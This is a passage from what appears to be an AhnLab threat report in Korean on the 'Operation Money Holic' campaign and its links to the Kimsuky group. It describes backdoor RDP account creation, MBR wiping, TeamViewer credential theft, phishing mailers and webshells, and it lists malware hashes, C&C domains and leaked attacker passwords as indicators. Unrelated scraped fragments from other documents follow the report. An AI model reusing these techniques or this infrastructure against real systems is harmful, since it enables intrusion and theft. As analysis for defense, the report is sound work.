37 그가존재했다. 일자진단경로진단명 C:\Users\ASPNET\Desktop\spoolsve.exe Trojan/Win32.Agent.R C:\Users\ASPNET\Desktop\Server.vmp.exe Trojan/Win32.Agent.R C:\Users\ASPNET\Desktop\win7_x64\DnscacheUpdate.dll Trojan/Win32.Agent.R C:\Users\ASPNET\Desktop\win7_x64\IPCheck.dll Trojan/Win32.Agent.R [ 표 13] 감염 PC 1 의진단정보 (2) 지금까지확인한정보를토대로오퍼레이션머니홀릭조직이악성코드를통해감염 PC에 ASPNET과같은원격데스크톱 (RDP) 계정을생성한이유는크게 2가지로요약할수있다. 감염 PC 악용백신에의해서악성코드가진단및삭제되더라도악성코드가생성한 RDP 계정은남아있기때문에 RDP 를통해감염 PC에무단으로접속해악성코드진단테스트등의악의적인행위를계속할수있다. 추적회피목적일반적으로공격자는자신이제작한악성코드를실제로유포하기전에공격대상이사용하는백신으로진단여부를테스트해보거나 VirusTotal 에업로드하여백신제품의진단현황을확인한다. 이과정에서작은실수로공격자의정보가노출되는경우도있는데, 이런정보를이용해보안업체나사법기관은공격자를추적하거나프로파일링한다. 그러나오퍼레이션머니홀릭의사례처럼공격자가감염 PC를활용하면자신의존재를숨길수있기때문에추적을따돌리고프로파일링을방해할수있다. (2) 문서파일수집감염 PC에이동식디스크가연결되어있다면백도어를통해 ghost.exe 를유포한것으로보인다. 해당파일은드라이브타입이이동식디스크일경우특정확장자 (.jpg,.png,.doc,.docx,.xls,.xlsx,.pdf,.hwp,.txt,.zip) 를가진파일을검색한후특정폴더 (%Public%\Documents\[ 랜덤폴더명 ]) 에수집한다. AhnLab, Inc. All rights reserved. 37
38 [ 그림 48] 수집대상확장자및수집파일 ( 한글 ) 예시 그러나 ghost.exe 는 C&C 와통신하는기능이없으며, 따라서수집한파일은실행중인백도어를통해유출 한것으로추정된다. (3) MBR(Master Boot Record) 파괴 백도어 TiWorker.exe 에의해다운로드된 Bang.exe 는감염 PC 의 HDD 0 번째섹터에위치한 MBR 의일부영역 을 0 으로덮어쓴후 shutdown 명령을사용하여감염 PC 를종료한다. [ 그림 49] MBR 파괴기능 AhnLab, Inc. All rights reserved. 38
39 [ 그림 50] 에서붉은색으로표시된부분이 Bang.exe 의실행전과후를비교한것으로, 해당영역에감염 PC 의 파티션테이블정보가존재한다. [ 그림 50] 정상 MBR 과파괴된 MBR 비교 Bang.exe 에의해감염 PC 의파티션테이블정보가손상되었기때문에 shutdown 명령으로전원이꺼진 (OFF) PC 를다시부팅하면 [ 그림 51] 과같이 Invalid partition table 이라는에러메시지가나타나고부팅이되지 않는다. [ 그림 51] 부팅시나타나는에러메시지 (4) 팀뷰어계정정보탈취 메모리패치방식을사용해서팀뷰어계정정보를탈취시도하는악성코드도유포됐으며, 해당악성코드의 동작과정은다음과같다. AhnLab, Inc. All rights reserved. 39
40 [ 그림 52] RCP.exe 의동작과정 ❶ RCP.exe 에 3.6버전의팀뷰어와악성코드가리소스형태로존재 ❷ RCP.exe 가 mfc100d.dll 을 lcass.exe 에인젝션 ❸ 인젝션된 mfc100d.dll 은 lcass.exe, 즉팀뷰어에서아이디 / 비밀번호가처리되는코드영역을메모리패치 ❹ mfc100d.dll 은메모리패치를통해획득한팀뷰어의아이디 / 비밀번호를 RCP_Info(Jerry).log 에기록 [ 그림 53] 은위의과정중위의과정중 ❸, ❹ 번에해당하는내용이다. AhnLab, Inc. All rights reserved. 40
41 [ 그림 53] 팀뷰어아이디획득을위한메모리패치과정 ❶ 팀뷰어에서메모리패치주소를획득하기위한거리계산 ❷ 팀뷰어에서아이디를처리하는부분을메모리패치하는코드 ❸ 메모리패치후팀뷰어아이디획득시 mfc1000d.dll의파일기록기능으로분기하는코드로획득한팀뷰어아이디는 RCP_Info(Jerry).log 에기록 그러나팀뷰어홈페이지에서최신버전을다운로드및설치한후 mfc1000d.dll 를강제로로딩시켜테스트한결과, 팀뷰어계정정보를획득할수없었다. 또한 mfc1000d.dll 의잘못된메모리패치로인해실행중인팀뷰어가종료됐다. 즉, 오퍼레이션머니홀릭조직이테스트한팀뷰어버전은 3.6버전으로, 해당버전에서는팀뷰어계정정보를탈취할수있지만최신버전에서는탈취할수없다는실패한다는의미다. 한편, 오퍼레이션머니홀릭은백도어를통해키로거, 마이너, 악성 Autoit 스크립트, 닷넷백도어등다양한악성코드를테스트목적으로유포했다. AhnLab, Inc. All rights reserved. 41
42 악성코드프로파일링 악성코드프로파일링은악성코드의변화를추적하고관리함으로써향후발생할수있는사이버공격을예측하고대비하는데도움을주는작업으로, 악성코드분석및대응만큼반드시필요하다. 그러나악성코드분석및대응과달리악성코드프로파일링은단기간에완료할수있는작업이아니므로긴호흡으로장기적인관점에서진행해야한다. 장기간에걸쳐악성코드의변화를추적하다보면특정국가의지원을받는공격조직과관련된경우를발견하게되는경우도있는데, 그관련성을밝혀내는것또한악성코드프로파일링의중요한역할이라할수있다. 그러나공격자들은악성코드프로파일링을방해하거나혼란을주기위해위장기법 (False Flag) 이나공개된해킹툴사용, VPN 경유등다양한방법을동원하고있다. 따라서악성코드프로파일링은다수의가능성을열어두고신중하게접근하면서공격의실체에근접할수있는가능성을높이는작업이다. 한편, 안랩은 2018 년 2 월부터특정한악성코드의변화를지속적으로추적하고분석한결과, 일련의공격 사례가특정국가의지원을받는공격조직인 Kimsuky 조직을연상시키는다수의근거를확인했다. 1. 악성코드비교 2018 년 2 월, 앞서살펴봤던감염 PC 1 과유사한감염패턴을가진감염 PC 2 를발견했다. 감염 PC2 에서 userrepairkey_x86.exe 등감염 PC 1 의 Utilman.exe 와동일한기능을가진다수의악성코드가확인됐다. 일자진단경로파일명 C:\Windows\System32\ipnet.dll ipnet.dll C:\Windows\System32\ntwdblib.dll NTWDBLIB.dll C:\Windows\Temp\userrepairkey_x86.exe UserRepairKey_x86.exe C:\Users\***\Downloads\111\dnscacheupdate.dll DnscacheUpdate.dll C:\Users\***\Downloads\111\ipcheck.dll IPCheck.dll [ 표 14] 감염 PC 2 의진단정보 AhnLab, Inc. All rights reserved. 42
43 이들두 PC 에서발견된악성코드의 RDP 계정추가기능을비교한결과, [ 그림 54] 와같이비밀번호만다를 뿐동일한것으로나타났다. [ 그림 54] RDP 계정추가기능비교 또한 [ 그림 55] 와같이 RDP 계정이 ASPNET 으로동일하며, 계정의설명문구도유사했다. [ 그림 55] 파일별 RDP 계정및설명문구 AhnLab, Inc. All rights reserved. 43
44 감염 PC 1 의 Utilman.exe 는지난 2017 년 2 월에또다른 PC 에서발견된이력이있으며, 해당 PC( 이하감염 PC 3) 에서추가로발견된키로거는 Kimsuky 조직이 2013 년에사용한키로거와동일했다 ([ 그림 56] 참고 ). [ 그림 56] 2013 년 Kimsuky 조직의키로거와 2017 년감염 PC 3 의키로거 2017년 8월부터 Kimsuky 조직이제작한악성코드에간헐적으로감염됐던 PC( 이하감염 PC 4) 에서도감염 PC 1의 Utilman.exe와유사한기능을가진악성코드를발견했다. [ 그림 57] 은감염 PC 1의 Utilman.exe와감염 PC 4의 dnsadmin.exe를비교한것으로, 코드와감염 PC에추가된 RDP 계정은다르지만동일한비밀번호 (waldo1215!) 를사용했음을알수있다. 또한감염 PC 1의 Utilman.exe에존재하는 dnsadmin 이라는문자열이감염 PC 4의 EXEJINBO.exe에도존재한다. 해당문자열은 C&C 서버와의통신에사용된다. AhnLab, Inc. All rights reserved. 44
45 [ 그림 57] 동일한비밀번호와문자열사용 N o Type 파일명 팀뷰어버 전 PDB 1 MoneyHol ic coinstager.e xe c:\teamviewer5_release\teamviewer\release\teamvie wer.pdb 2 MoneyHol ic lcass.exe c:\teamviewer_3.6\teamviewer\release\teamviewer.p db 3 Kimsuky netsvcs.exe c:\teamviewer5_release\teamviewer\release\teamvie wer.pdb 4 Kimsuky MsMpQhp.e xe c:\teamviewer\teamviewer\release\teamviewer.pdb 5 Kimsuky spl.exe Kimsuky xpsp2.exe c:\teamviewer5_release\teamviewer\release\teamvie wer.pdb c:\teamviewer5_release\teamviewer\release\teamvie wer.pdb [ 표 15] 팀뷰어버전및 PDB 정보 AhnLab, Inc. All rights reserved. 45
46 [ 표 15] 는팀뷰어의파일버전및 PDB 정보를정리한것으로, 그내용을종합하면크게두가지로요약할수있다. 첫째, [ 표 15] 의 1번, 3번, 5번, 6번의팀뷰어버전과 PDB 정보가동일하며 2번과 4번팀뷰어의 PDB 정보도유사하다. 둘째, 1번, 3번, 5번, 6번의팀뷰어상세파일등록정보를확인해보면 [ 그림 57] 과같이 1번과 6 번팀뷰어의파일등록정보와일치한다. 3번과 4번도팀뷰어파일등록정보가일치한다. 물론, 1 번, 6 번과 3 번, 5 번을비교하면 ComapnyName 이나 InternalName 등다소의차이가보이지만, 전체 적으로유사한패턴의파일등록정보를갖고있음을알수있다. 이중에서 3 번, 5 번, 6 번팀뷰어는 Kimsuky 조직에서사용했다. [ 그림 58] 팀뷰어의파일등록정보비교 2019 년 5 월 24 일 VirusTotal 에업로드된 Huobi Research Weekly (Vol. 62) doc 파일에 서도오퍼레이션머니홀릭과 Kimsuky 조직과의관련성을추정할수있는흔적이발견됐다. [ 그림 59] 의 _01.doc 파일은오퍼레이션머니홀릭조직이유포한것이고, Huobi Research( 이하 AhnLab, Inc. All rights reserved. 46
47 생략 ).doc 파일은 Kimsuky 조직에서유포한악성파일이다. 이들두악성파일에포함된악성매크로를비교하면 [ 그림 59] 와같이매우유사함을확인할수있다. 특히매크로영역에오퍼레이션머니홀릭조직에서사용한 C&C 서버주소인 surl = fighiting1013.org/2/ 가 Huobi Research.doc 파일에도동일하게존재하나주석처리되어있으며, 새로운 C&C 서버인 naoei3-tosma.96.lt 가추가됐다. [ 그림 59] 악성코드의악성매크로비교 [ 그림 60] 의등록정보에서볼수있는것처럼, 두악성코드를만든날짜 ( 및시간 ) 과만든이도동일하다. AhnLab, Inc. All rights reserved. 47
48 [ 그림 60] 악성코드의등록정보비교 Huobi Research.doc 파일과이파일이다운로드하는 1.dat 파일을 Kimsuky 조직이제작한것으로판단하는근 거는다음과같다. 첫째, 1.dat 는데이터파일처럼보이지만실제로는 DLL 파일이며, 같은달에발견된 Sway.dat 와코드가 동일함을확인했다. [ 그림 61] C&C 통신기능비교 둘째, Sway.dat 는 [ 그림 62] 의 Liryc.dat 에의해생성되는파일이다. Liryc.dat 는과거특정공격에서악성 한글파일이다운로드한 core.dll 과동일한악성코드로, core.dll 은안랩이 2019 년 2 월에공개한 Kimsuky 조직 관련 오퍼레이션카바코브라보고서 에설명되어있다. AhnLab, Inc. All rights reserved. 48
49 - [ 그림 62] 악성코드의문자열비교 이와같은근거를토대로 Huobi Research.doc 파일과해당파일이다운로드하는 1.dat 는 Kimsuky 조직이제 작한것으로판단할수있다. 2. 악성코드유포지와문자열 Jerry [ 표 16] 은 Kimsuky 조직이사용한악성코드유포지의일부로, 악성코드유포, 피싱메일발송, 감염 PC 로그 를저장하는용도로사용했다. IP URL 설명 no-vac.esy.es naver-mail-com.hol.es free-tell.esy.es finale-jack.esy.es embed-helper.esy.es 네이버피싱, 메일러존재네이버피싱 free-tell.esy.es/dl_ex1.png?fn= 파일명 finale-jack.esy.es/dl_ex1.png?fn= 파일명 Jerry계정의감염 PC로그존재 [ 표 16] Kimsuky 조직이사용한악성코드유포지 [ 표 16] 의 no-vac.esy.es 주소에는공격자가사용하는메일러가존재한다. 메일러에는 [ 그림 63] 과같이공 격목표의메일주소를입력하는텍스트영역과버튼이있다. 이를이용하여공격대상에게특정포털사 AhnLab, Inc. All rights reserved. 49
50 이트업체의메일로위장한피싱메일을발송할수있다. [ 그림 63] 피싱메일러동작과정 [ 그림 63] 의피싱메일발송이완료된후나타나는메시지에서 성과적으로발송되였습니다 라는표현을볼수 있다. 이는한국에서사용되지않는표현이다. 또한메일러를통해발송된메일에연결된피싱페이지에서도 Kimsuky 조직으로의심되는정황이확인됐다. [ 그림 64] 메일러를통해발송된피싱메일및피싱페이지 AhnLab, Inc. All rights reserved. 50
51 [ 그림 64] 의메일본문에포함된 비밀번호재확인 버튼을클릭하면피싱페이지에연결되는데, 이페이지의 도메인주소는국내유명포털사이트의주소 (naver.com) 와유사한 naverhelper.com 이다. 또다른도메인 embed-helper.esy.es 주소에서악성코드감염을통해업로드된시스템로그가확인됐다 ([ 그림 65]). [ 그림 65] embed-helper.esy.es 에업로드된감염 PC 로그 업로드된 3 개의파일명은 BASE64 로암호화된감염 PC 의 IP 와로그생성시간을조합한것으로, 복호화결과는 [ 표 17] 과같다. No BASE64 복호화전 BASE64 복호화후로그생성시간 IP Info 1 MTc1LjE2Ny4x******= *** AM CN, Shenyang 2 MTc1LjE2Ny4xM******= *** AM CN, Dalian 3 MTI0LjIxNy4yMDku****** *** AM KR, 리눅스랩 [ 표 17] 감염 PC 로그의특징 [ 표 17] 의 1 번과 2 번은 Kimsuky 조직이자주사용하는 IP 대역이다. [ 그림 66] 은 Kimsuky 조직이 2017 년 에 C&C 로사용했던주소에서발견된감염 PC 의로그의일부로, IP 가 [ 표 17] 의 IP 와 B 클래스대역까지 동일하다. [ 그림 66] Kimsuky 조직이 2017 년에사용한 C&C 에업로드된감염 PC 정보 AhnLab, Inc. All rights reserved. 51
52 업로드된파일내부에는 [ 그림 67] 과같이폴더및파일목록, 프로세스목록, 네트워크정보등이기록되 어있으며, 공통적으로 jerry 라는문자열이존재한다. 해당문자열은 Kimsuky 조직이악성코드제작및테 스트에사용했던운영체제에로그인한아이디이다. [ 그림 67] 복호화결과및공통적으로존재하는 jerry 문자열 오퍼레이션머니홀릭조직이제작한악성코드의디버그메시지, PDB, 그리고 C&C 에저장되있던로그에도 동일한 Jerry 문자열이존재한다 ([ 그림 68]). AhnLab, Inc. All rights reserved. 52
53 [ 그림 68] RCP.exe 와 C&C 에존재하는 Jerry 3. 동일한 C&C, 두개의흔적 [ 그림 69] 의 main.php 는 2017 년 9 월에업로드된것으로, Kimsuky 조직이해당웹쉘을사용하는것으로판단 한근거는 [ 표 18] 과같다. [ 그림 69] 웹쉘이존재하는 C&C [ 표 18] 의접속 IP 는 Kimsuky 조직이악성코드진단및테스트시사용한 IP 로, jhj=34 라는인자값을사용 해웹쉘에접근한이력이있다. 인자값으로사용한 jhj 는 Kimsuky 조직의구성원중하나의이니셜로추 정된다. 접속일자접속 IP 접속국가접속 URL *** Korea, Republic of rentalcars***.amex***.net/main.php?jhj=34 [ 표 18] Kimsuky 조직이웹쉘에접근한이력 AhnLab, Inc. All rights reserved. 53
54 [ 그림 70] 2018 년 3 월악성코드유포이력 또한 Kimsuky 조직의메일러로추정되는 send.php 에접근한이력을발견했으며 ([ 표 19]), 이를통해공격자 가사용한메일러 star 3.0 을확보했다 ([ 그림 71]). 접속일자접속 IP 접속국가접속 URL *** Korea, Republic of Rentalcars***.amex***.net/send/send.php [ 표 19] Kimsuky 조직 ( 추정 ) 이메일러에접근한이력 [ 그림 71] 메일러 star 3.0 오퍼레이션머니홀릭조직과 Kimsuky 조직에서접근했던메일러의파일명과경로는아래와같이 host 이름 만다를뿐, 나머지는동일한것으로확인됐다. AhnLab, Inc. All rights reserved. 54
55 Kimsuky 조직의접근 URL: 오퍼레이션머니홀릭조직의접근 URL: 또한, 오퍼레이션머니홀릭조직이실제로발송한메일의헤더를분석한결과, 다른 C&C 서버에서도 [ 그림 71] 과동일한구조를가진폴더와메일러를추가로발견했다 ([ 그림 72]). [ 그림 72] 메일헤더를통해확인된 C&C 와메일러 앞서오퍼레이션머니홀릭조직이윈도우운영체제의 PC뿐만아니라안드로이드스마트폰을공격대상에포함했던것을확인한바있다. [ 그림 72] 의메일러상단에표기된 victory 라는문자열은악성앱이통신하는 C&C에존재하는웹쉘의로그인비밀번호로, 이를이용해로그인하면 [ 그림 73] 과같은웹쉘 config.php 가존재한다. [ 그림 73] 웹쉘로그인후 AhnLab, Inc. All rights reserved. 55
56 웹쉘을통해 C&C 서버의폴더를탐색한결과, [ 그림 74] 와같이악성앱에감염된안드로이드스마트폰 으로전송할명령 (get_clipboard) 이 txt 형태로저장되어있는것을확인했다. 또다른폴더에는일부피해자 들의스마트폰에서수집한것으로보이는정보가존재했다. [ 그림 74] C&C 서버에존재하는로그 4. 문자열 Jhon 또는 John 감염 PC 1 의진단정보에 John 이라는문자열이존재한다. 일자진단경로진단명 C:\Users\John\Desktop\spoolsve.exe Trojan/Win32.Agent.R C:\Users\John\Desktop\NTWDBLIB.dll Trojan/Win64.Agent C:\Users\John\Documents\drv.dll Trojan/Win32.Agent.R C:\Users\John\Documents\spoolsve.vmp.exe Trojan/Win32.Agent.R [ 표 20] 감염 PC 1 의진단정보 John 이라는문자열은 Kimsuky 조직이 2014 년한수원공격에서심리전목적으로사용했던트위터와악성 코드제작에사용했던계정이다. AhnLab, Inc. All rights reserved. 56
57 [ 그림 75] Kimsuky 조직이사용한 John 문자열및 2014 년문서 John 이라는문자열은일반적인계정에흔히사용될수있는문자열인만큼이것만으로공격조직을특정할수는없다. 그러나 [ 표 20] 의문자열 John 과 [ 표 10] 의문자열 Jhon 을연관지어생각해볼필요도있다. 두문자열의 o와 h의순서가다른것은오타에의한것일가능성을배제할수없다. 키보드상에서 h, j, n 이모두오른쪽에위치하고있으며, 서로매우근접하게자리하고있기때문에 John을입력하려다 Jhon로잘못입력하는경우는흔하다. 또한안랩은해당앱을추적하는과정에서동일한패키지명과기능을갖고있는다른앱을확인했다. 추가 로확인된앱은암호화폐거래소인빗썸 (Bithumb) 으로위장하고있었다 (Bithubmprotect.apk). 해당앱의악 성행위는동일하며, C&C 서버주소의패턴도유사하다. AhnLab, Inc. All rights reserved. 57
58 [ 그림 76] BithumbProtect.apk 의 C&C 서버주소 이들앱이사용하는 C&C 서버의패턴에서도유사성이확인되었다. 항목 [ 그림 40] 의악성앱 BithumbProtect.apk Package Name app.project.appcheck C&C /manager/up.php manage.app-wallet.com/up.php [ 표 21] 앱비교정보 C&C 서버로사용한 app-wallet.com 의도메인등록정보는 [ 표 22] 와같으며, 대표적인암호화폐인비트코 인 (bitcoin) 의문자열로이메일계정을등록했다. 항목 app-wallet.com rneail.com Name Annie Cho Annie Cho bitcoin025@hanmail.net bitcoin018@hanmail.net [ 표 22] 리버스도메인등록정보 안랩은도메인등록자를추적하던과정에서도메인등록자 Annie Cho 가등록한도메인 rneail.com 외에 다수의도메인을확인했다. AhnLab, Inc. All rights reserved. 58
59 항목 grnaeil.com rnaii.com Name Dongil Song Dongil Song [ 표 23] bitcoin024@hanmail.net 등록정보 구글의지메일인 gmail.com 과유사한 grnaeil.com 도메인은 로연결되는데, 이는 2019 년 5 월에 유포된 TiWorker.exe 의 C&C 주소 ( ) 와동일하다. [ 그림 77] 2019 년 5 월에유포된 TiWorker.exe 또한같은대역대인 에네이버와유사한도메인인 nid.helpnaver.com 이연결되는것을확 인했다. 해당도메인의등록정보를살펴보면 Jhon 과유사한 Jhone 문자열을확인할수있다. 항목 nidhelpnaver.com helpnaver.com Name Jane Jhone Aji 917 snow8949@hotmail.com tiger199392@daum.net [ 표 24] 리버스도메인등록정보 또한같은시기에발생한공격인 APT Campaign Smoke Screen targeting to Korea and US( 이스트시큐리티, 에서동일한공격자정보인 snow8949@hotmail.com, Aji 917, tiger 를 확인할수있다. AhnLab, Inc. All rights reserved. 59
60 결론 2018년 2월부터 2019년 8월현재까지오퍼레이션머니홀릭조직이사용한악성코드를프로파일링한결과, 해당조직의악성코드제작방식이나악성코드동작방식은 Kimsuky 조직과는차이가있다. 그러나지금까지살펴본바와같이악성코드, 유포지, C&C 등다양한근거를토대로오퍼레이션머니홀릭조직과 Kimsuky 조직이밀접하게관련되어있는것으로판단할수있다 한편, 오퍼레이션머니홀릭조직에서사용한악성코드의파일명으로공격대상이나목적을짐작할수있다. 계약서확인건.doc 파일은직접적으로금전적이득을노린것같지않지만, 해당파일이탈취한공격대상 의정보를분석한결과, 결국암호화폐를포함한금전적인이득을취하려는목적이확인되었다. 본보고서에서오퍼레이션머니홀릭조직과다른조직과의연관성에대해좀더명확하게밝힐수없는것은아쉽지만, 이는단기간에이루어지기힘든작업이다. 향후안랩은지속적으로오퍼레이션머니홀릭조직을꾸준히추적하고프로파일링할계획이며, 이를통해확인된내용은추가보고서를통해공개할계획이다. 또한그과정에서국가기관및보안업체들과협업하여해당조직의실체를밝히는데노력할것이다. AhnLab, Inc. All rights reserved. 60
61 안랩제품대응현황 안랩 V3 제품군에서는오퍼레이션머니홀릭과관련된악성코드를다음과같은진단명으로탐지하고있 다. 파일명 MD5 V3 진단정보 a77566ec d5fe0eb4d647c6ac0 V3:Trojan/Win32.Agent ( ) DnscacheUpdate.dll 1d9668a4d59b19d50f93481f65ca4e46 V3:Trojan/Win32.Agent ( ) 068a6acb7d4ec0d146497e37fccca210 V3:Trojan/Win32.Agent ( ) 0c08c15f4becc21fab5ee3a0871f2c39 V3:Trojan/Win32.Rdpwrap ( ) RDP Warapper 4a86f ff04f2a16bb db0b2bdd0d5df1de9da0b108d0f9 6 a553bd68ee74e920eb7c4f068ce35706 V3:Win-Trojan/Craydoor.Exp ( ) V3:Unwanted/Win32.RemoteAdmin ( ) V3:Trojan/Win32.Rdpwrap ( ) b2fcef57d62ca5075e62975aee V3:Win-Trojan/Alisa.Exp ( ) d32f6ed7958c07698d3f51e7268f1fa4 V3:Unwanted/Win32.Rdpwrap ( ) Ghost.exe 46874dfa dd69248ae13cc19 d V3:Trojan/Win32.Agent ( ) spoolsve.exe 76c8da4147b08e902809d1e80d96fbb 4 V3:Trojan/Win32.Agent ( ) f6ebbd988d6f c6ede200ce36 V3:Trojan/Win32.Agent ( ) Utilman.exe 1d6ce0778cabecea9ac6b985435b268 b V3:Trojan/Win32.NsSpy ( ) AhnLab, Inc. All rights reserved. 61
62 userrepairkey_x86.exe 9cb536f3af8a9d52937dddac43d3de99 V3:Trojan/Win32.Agent ( ) sqldebuger.exe dnsadmin.exe 96cc b047e5ab2565f91e1eaaa 1d6ce0778cabecea9ac6b985435b268 b V3:HackTool/Win32.Agent ( ) V3:Trojan/Win32.NsSpy ( ) RCP.exe 51e161503b6cd3d9f854cffcbfcd4e77 V3:Backdoor/Win32.RemoteControl ( ) lcass.exe 2827cc82c23cc d331c7475f V3:Backdoor/Win32.RemoteControl ( ) mfc100d.dll ac7f2afa1934eb9178de53ec1c50d6aa V3:Trojan/Win32.HackTool ( ) coinstager.exe a25811b24b7f27a486c05c0a09ad992d V3:Trojan/Win32.XwDoor ( ) _01.doc FD F3544CBA96BA6E4A7D V3:W97M/Downloader ( ) Huobi Research Weekly (Vol.62) doc f5028dc793e06b20b4048f33a6 V3:DOC/Downloader ( ) 1.dat C4379FB6A0041C EDA4FC5EA 49 V3:Trojan/Win32.Infostealer ( ) Sway.dat b12fa22d02fda312eaf31babe2d719e9 V3:Trojan/Win32.Infostealer ( ) core.dll cf59970c8c871f085ce18fcb1b V3:Backdoor/Win32.Akdoor ( ) Lyric.dat 109a42f52b68b1af7ec1ac3d5cb22cfd V3:Backdoor/Win32.Akdoor ( ) exe 5259e9a fdd47d2c9ade0e35f V3:Trojan/Win32.Agent ( ) Google Update.exe D94F7A8E6B5D7FC239690A7E65EC17 V3:Trojan/Win32.XwDoor AhnLab, Inc. All rights reserved. 62
63 78 ( ) 1-EXEJINBO.exe netsvcs.exe 2bd4380c9aabe58812c9088d40bf127 d ab73b c48d62b7eeb5c9f3409 d V3:Trojan/Win32.Akdoor ( ) V3:Win-Trojan/Agent ( ) spl.exe b02f f0912b2ae3f27498c448f V3:Trojan/Win32.XwDoor ( ) xpsp2.exe 11fc4829c2fff9fb240acbd71c60fc67 V3:Dropper/Win32.TeamRat ( ) 1.scr 37c6326f3cf3542e52439a66150ba278 V3:Trojan/Win32.Injector ( ) ipnet.dll f05af1304c8fb427b5f073f2e0154c0e V3:Trojan/Win32.Agent ( ) 시멘트 석.doc 제품지표분 123CC F3E952A31ADD0776E 3E V3:RTF/Exploit ( ) 거래내역.doc 8fc875be2f4b6be1fd31ef6a99d0be25 V3:RTF/Exploit ( ) 컨텐츠공급계약서초 안.doc 067A81CFFDC9FC18A6F9D7C746D0D 3E5 V3:W97M/Downloader ( ) BTS 자료.zip_ycy.doc svchost.exe kmrin.exe A2B2B70DFB4C34D376E71BB5AD941 73B 7ABF91E1D313126F0A0E77074E50586 A C4740A5F648A D9F80 C8 V3:VBA/Amabot.S2 ( ) V3:Trojan/Win32.Amabot ( ) V3:Trojan/Win32.Amabot ( ) lig.exe spolsve.exe bang.exe ecfc59216dd787dff53cf2e4b7d0f832 e1dd36e8d4091db216067d4e813612c 9 7b8c66707da8bfecd4d334dd7c45b23 6 V3:Win-Trojan/Craydoor.Exp ( ) V3:Trojan/Win32.Amabot ( ) V3:Trojan/Win32.DiskWriter ( ) AhnLab, Inc. All rights reserved. 63
64 DaumProtect.apk a3f297208d69bd597e7235cad7faefaf MO: ( ) Android-Trojan/Cannie NaverProtect.apk 1793f7bddf6be0129fe8af7488dd384f MO: ( ) Android-Trojan/Cannie KakaoTalk.apk 6c290d6ddbe317844a4dccdc2259c6c 1 MO: ( ) Android-Trojan/Cannie Bithubmprotect.apk c1063cfa402e64882d41f88ada87c8d1 MO: ( ) Android-Trojan/Cannie 사업계획서.hwp 한울 1,2 호기설계 변경사항.hwp B5B6E93AB27CEC75F07AF2A3A6A CFD7029A26A3F3F5E9087D 8A V3:HWP/Exploit ( ) V3:HWP/Exploit ( ) WXB 코인배정내용 - 송부용.xlsx{ 공백 }.exe 6f5f22753af dcd76bf316ea V3:Trojan/Win64.Agent ( ) ***** 조직 3 차 -5 차 마지막 BCOT 구매리 스트및수량계산확 인.hwp.exe 45fa564f2ccea45ff26099cb3737d654 V3:Trojan/Win32.Agent ( ) [ 표 25] V3 제품대응현황 IoC (Indicators of Compromise) 1. MD5 위의 [ 표 25] 참고 AhnLab, Inc. All rights reserved. 64
65 2. C&C 및유포지 signetsys.com orion.kim webhostapp.com webhostapp.com webhostapp.com attach apps.com attach apps.com vnik.000webhostapp.com no-vac.esy.es naver-mail-com.hol.es free-tell.esy.es finale-jack.esy.es embed-helper.esy.es naoei3-tosma.96.lt apps.com downok1013.1apps.com rainbow1013.1apps.com gotomyhouse1013.1apps.com indiana1014.1apps.com alabamaok0515.1apps.com fighiting1013.org rainbow.webrnail.com gmaildown.1apps.com cert-us.com AhnLab, Inc. All rights reserved. 65
66 u hostingerapp.com snop.webrnail.com mklawyer.maru.net result-viewer.com mytut.net/snop/ snop.mytut.net naver.attach-download.com daum.attach-download.com AhnLab, Inc. All rights reserved. 66
67 별첨 < 도움주신분들 > 안랩 ASEC대응팀박태환안랩분석연구팀차민석이스트시큐리티문종현금융보안원장민창, 김재기한국인터넷진흥원김병재 AhnLab, Inc. All rights reserved. 67
ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하
Security Trend ASEC REPORT VOL.79 July, 2016 ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationWindows 8에서 BioStar 1 설치하기
/ 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar
More information*2008년1월호진짜
3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가
More informationMicrosoft Word - src.doc
IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...
More informationSBR-100S User Manual
( 1 / 13 ) SBR-100S 모델에 대한 사용자 펌웨어 업그레이드 방법을 안내해 드립니다. SBR-100S 는 신규 펌웨어가 있을시 FOTA(자동업데이트) 기능을 통하여 자동 업그레이드가 되며, 필요시 사용자가 신규 펌웨어를 다운받아 수동으로 업그레이드 할 수 있습니다. 1. 준비하기 1.1 연결 장치 준비 펌웨어 업그레이드를 위해서는 SBR-100S
More informationOffice 365 사용자 가이드
[ 여기에입력 ] Office 365 사용자가이드 OFFICE 365 모바일설정 목차 1. 모바일에메일계정추가하기... 2 2. Lync 2013 App 설치하기... 7 3. Office Mobile App 설치하기... 10 4. Office for ipad 설치하기... 16-1 - 모바일기기에 Office 365 를설정해보세요. 모바일기기에 Office
More informationActFax 4.31 Local Privilege Escalation Exploit
NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고
More informationMicrosoft Word - ntasFrameBuilderInstallGuide2.5.doc
